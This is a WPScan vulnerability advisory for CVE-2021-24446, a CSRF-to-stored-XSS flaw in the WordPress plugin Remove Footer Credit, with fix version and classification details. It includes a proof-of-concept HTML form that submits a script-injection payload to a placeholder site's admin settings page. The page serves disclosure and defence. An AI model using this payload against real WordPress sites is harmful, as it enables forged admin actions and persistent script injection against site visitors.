WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Remove Footer Credit < 1.0.6 - CSRF to Stored Cross-Site Scripting

Description

The plugin does not have CSRF check in place when saving its settings, which could allow attacker to make logged in admins change them and lead to Stored XSS issue as well due to the lack of sanitisation

Notes:
- v1.0.6 fixed the CSRF, however sanitisation only removed script tags, leading to an Authenticated Stored XSS issue, a separate advisory has been created for it

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=remove-footer-credit" method="POST">
      <input type="hidden" name="find" value="powered" />
      <input type="hidden" name="replace" value='">--><script>alert(/XSS/)</script>' />
      <input type="hidden" name="willLinkback" value="no" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Note: The find/replace values depend on the theme used (tested with Twenty twenty) and the XSS will be triggered in the frontend

Affects Plugins

remove-footer-credit
Fixed in version 1.0.11

References

CVE
CVE-2021-24446

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
be55131b-d9f2-4ac1-b667-c544c066887f

Timeline

Publicly Published

2021-07-12 (about 1 years ago)

Added

2022-01-11 (about 1 years ago)

Last Updated

2022-04-12 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin